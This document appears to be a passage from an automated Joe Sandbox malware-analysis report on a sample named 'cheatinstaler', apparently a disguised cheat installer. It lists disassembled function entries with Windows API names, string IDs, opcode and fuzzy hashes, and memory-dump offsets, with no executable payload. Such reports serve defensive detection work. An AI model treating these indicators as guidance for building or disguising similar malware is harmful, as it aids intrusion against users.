                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: $*
                                                                                  • API String ID: 3215553584-3982473090
                                                                                  • Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                  • Instruction ID: 5233b932231616b60323850a7c9ac65f3afc3fb673f83960d83f9484cd6b080d
                                                                                  • Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
                                                                                  • Instruction Fuzzy Hash: 0851587291CA428AE764AF3A84E437C77A0FB05B99F9C1135CB4A41299CF3CF681C725
                                                                                  Function 00007FF754581758 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharMultiWide$StringType
                                                                                  • String ID: $%s
                                                                                  • API String ID: 3586891840-3791308623
                                                                                  • Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                  • Instruction ID: effe2b716d6e67ac4f5c15bb9210d798b4e929de05fb2150b17976a96c4ea33a
                                                                                  • Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
                                                                                  • Instruction Fuzzy Hash: 8641A122B14B858AFB60AF27D8912A9A391FB44BE8F9C0235EE1D477C5DF3CE5458710
                                                                                  Function 00007FF7545766A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 117COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFrameInfo__except_validate_context_recordabort
                                                                                  • String ID: csm
                                                                                  • API String ID: 2466640111-1018135373
                                                                                  • Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                  • Instruction ID: 3267df11559df9e80f9f8fda9f31acaba3c835280e1013683324c0d3ac2057d1
                                                                                  • Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
                                                                                  • Instruction Fuzzy Hash: 8A514C7662874587DA20BF26E09026EB7A4FB89BE0F980134EB8D07B55CF3CE551CB50
                                                                                  Function 00007FF754584360 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                  • String ID: U
                                                                                  • API String ID: 2456169464-4171548499
                                                                                  • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                  • Instruction ID: c2b9793051850f049377ff5c6b5250e84044a7b4e5327c5363d7fb93e3bd5f7e
                                                                                  • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                  • Instruction Fuzzy Hash: D041E832718A8182E721DF26E8943B9B7A0FB98794F984131EE4D87754EF7CD445C710
                                                                                  Function 00007FF7545690B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 83COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectRelease
                                                                                  • String ID:
                                                                                  • API String ID: 1429681911-3916222277
                                                                                  • Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                  • Instruction ID: 65a39e4d3ede8ac1c903785acdb9e3a223ad6e1abce6e74d158f23b4b352f86b
                                                                                  • Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
                                                                                  • Instruction Fuzzy Hash: D2315C3664874286EB04EF13B86872AB7A0FB89FD2F844435ED4A53B54CE3CE449CB10
                                                                                  Function 00007FF75455E870 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • InitializeCriticalSection.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8BB
                                                                                  • CreateSemaphoreW.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8CB
                                                                                  • CreateEventW.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8E4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                  • Instruction ID: 317b5ccc684b43da17cf953d3849f6bc65a2304d5d8233e3ff769bec49e56be2
                                                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                  • Instruction Fuzzy Hash: 1921E772E1960186F750AF26D4A43FD73A2EB84B0CFAC8034CA0D4B295CF7E9445C7A0
                                                                                  Function 00007FF7545685E0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDeviceRelease
                                                                                  • String ID:
                                                                                  • API String ID: 127614599-3916222277
                                                                                  • Opcode ID: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                  • Instruction ID: 3c46ab8cb446d8135096adc3ce3859340daeb6984bddd91266f60099888ad8a8
                                                                                  • Opcode Fuzzy Hash: a42f7bf34e2550c06df92b4c4441a28b155cc5d7cfc3f2a0da00e80f490195b4
                                                                                  • Instruction Fuzzy Hash: D9E0C222B4864182FB086BB7B5E903EA261AB4CBD1F598035DA1F43B94CE3CC8C44310
                                                                                  Function 00007FF75454D1A8 Relevance: 6.2, APIs: 4, Instructions: 238timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn$FileTime
                                                                                  • String ID:
                                                                                  • API String ID: 1137671866-0
                                                                                  • Opcode ID: da8e4aee29fe4f38c42170c81f4ee4074902937c75e678a33b987bd9d4a6a6c6
                                                                                  • Instruction ID: a9ca10756cdb156ed29ce379dea103c42a3a0686366c9a2c9f6bf5b855359c27
                                                                                  • Opcode Fuzzy Hash: da8e4aee29fe4f38c42170c81f4ee4074902937c75e678a33b987bd9d4a6a6c6
                                                                                  • Instruction Fuzzy Hash: 57A1B462E18B8281EA10EF66E4E41FDA361FB85784FD85131EA4D07AE9DF3CE544C720
                                                                                  Function 00007FF754560548 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast
                                                                                  • String ID:
                                                                                  • API String ID: 1452528299-0
                                                                                  • Opcode ID: 54200ff8d853bda438b9724302bbe7c4cb5cd052152846316c4389ee66fe2230
                                                                                  • Instruction ID: 1d121936e5290ddabf0c00dccba84e4921e4d22a617f02d6f5bde12dc02a5038
                                                                                  • Opcode Fuzzy Hash: 54200ff8d853bda438b9724302bbe7c4cb5cd052152846316c4389ee66fe2230
                                                                                  • Instruction Fuzzy Hash: 7C51C372F14A4295FB00EF76D4A42FCA321EB84BD8F984131EA1C577D6DE28D241C360
                                                                                  Function 00007FF754569D90 Relevance: 6.1, APIs: 4, Instructions: 106COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateCurrentDirectoryErrorFreeLastLocalProcess
                                                                                  • String ID:
                                                                                  • API String ID: 1077098981-0
                                                                                  • Opcode ID: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                                  • Instruction ID: bbbdb1f66f3af03c4e63f7319b4679d1bf544825273690d2b0da4c6a0d658532
                                                                                  • Opcode Fuzzy Hash: c706cd24276746ab5e2fa6f684baf4bd7a284fdc318c0cb51509761d2b1b6963
                                                                                  • Instruction Fuzzy Hash: 24517332618B8286F7509F62E4A47AEF7B4FB84B84F981035EA4D57A54DF3CD504CB60
                                                                                  Function 00007FF75457DB5C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                  • String ID:
                                                                                  • API String ID: 4141327611-0
                                                                                  • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                  • Instruction ID: ea4e854772a42b8ae95c1f7810265dde37a508da70128164a2f5b8fa6ea98131
                                                                                  • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                  • Instruction Fuzzy Hash: 6241B472A0864246F761AF1295E4379EA94FF80BD0F9C8131DB4D46AC5DF6CEA498B20
                                                                                  Function 00007FF754553980 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileMove_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 3823481717-0
                                                                                  • Opcode ID: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                  • Instruction ID: 8608ec7bc72fbe897afb7d95714e91e137e12681b002b0c1e3fd1f4e53a9bc72
                                                                                  • Opcode Fuzzy Hash: 9a9a58264430c11791c0c606b390f78d08ba3037c1fa37d6a31b7cedc8df9908
                                                                                  • Instruction Fuzzy Hash: 3741BF62F14B5285FB00EF76E8A41BC6372BB44BA8F985231EF5D67A99DF38D045C210
                                                                                  Function 00007FF75457D440 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$abort
                                                                                  • String ID:
                                                                                  • API String ID: 1447195878-0
                                                                                  • Opcode ID: a46f80a814de90fc6a6f27f4ba991d7ab4b28824e48526204554d6c2ee2a7ff7
                                                                                  • Instruction ID: 1f969449136f0d058ad26d58255ffb38e1da01cd17e97b88d25cf49f2783a0ad
                                                                                  • Opcode Fuzzy Hash: a46f80a814de90fc6a6f27f4ba991d7ab4b28824e48526204554d6c2ee2a7ff7
                                                                                  • Instruction Fuzzy Hash: 3E014011B0960742FA58BF23A6F5138E292BF447D0F9C4438E91E067D6ED6CBA098330
                                                                                  Function 00007FF754568590 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: CapsDevice$Release
                                                                                  • String ID:
                                                                                  • API String ID: 1035833867-0
                                                                                  • Opcode ID: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                  • Instruction ID: 91b43fafdc7a659ada45a4a00c8a36de7212c07a0b1e439bc29b9a864961cb9d
                                                                                  • Opcode Fuzzy Hash: de15d0a72ac65e47349a1b4cc9ca260558533dfe27db70e7b1e031f833f09c6c
                                                                                  • Instruction Fuzzy Hash: 26E0ED61E4960282FF087F7368F913AA191AF48743F8C4439C81F46750DE3CE5858724
                                                                                  Function 00007FF75454E34C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 176COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo_noreturn
                                                                                  • String ID: DXGIDebug.dll
                                                                                  • API String ID: 3668304517-540382549
                                                                                  • Opcode ID: 449ae4acbf0ec5e80cc2dc1195a0e30a3ca97b2f1ad0aa9b949921c8a17f74e9
                                                                                  • Instruction ID: fa799af9f8b4e8e103104234f74aacc6e54453ab3072434e3db1c2c23352214d
                                                                                  • Opcode Fuzzy Hash: 449ae4acbf0ec5e80cc2dc1195a0e30a3ca97b2f1ad0aa9b949921c8a17f74e9
                                                                                  • Instruction Fuzzy Hash: 4D71BC72A14B8182EB14DF26E4903ADB3A4FB547D4F984235DBAD07B99DF78E161C310
                                                                                  Function 00007FF75457E1F4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID: e+000$gfff
                                                                                  • API String ID: 3215553584-3030954782
                                                                                  • Opcode ID: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                  • Instruction ID: 31305754da7b271f3c78bd7f4e1bc197789ffa18478686dfe18a179ab1cff2b4
                                                                                  • Opcode Fuzzy Hash: ffbcb58cc87a1110f60409a8afde5d08377aab6ce8cf060c3284a5669936e3c2
                                                                                  • Instruction Fuzzy Hash: 5A51F562B187C146E729AF36999136DAA91FB81BD0F8C9231CB9C87BD5CE2CE544C710
                                                                                  Function 00007FF754559408 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
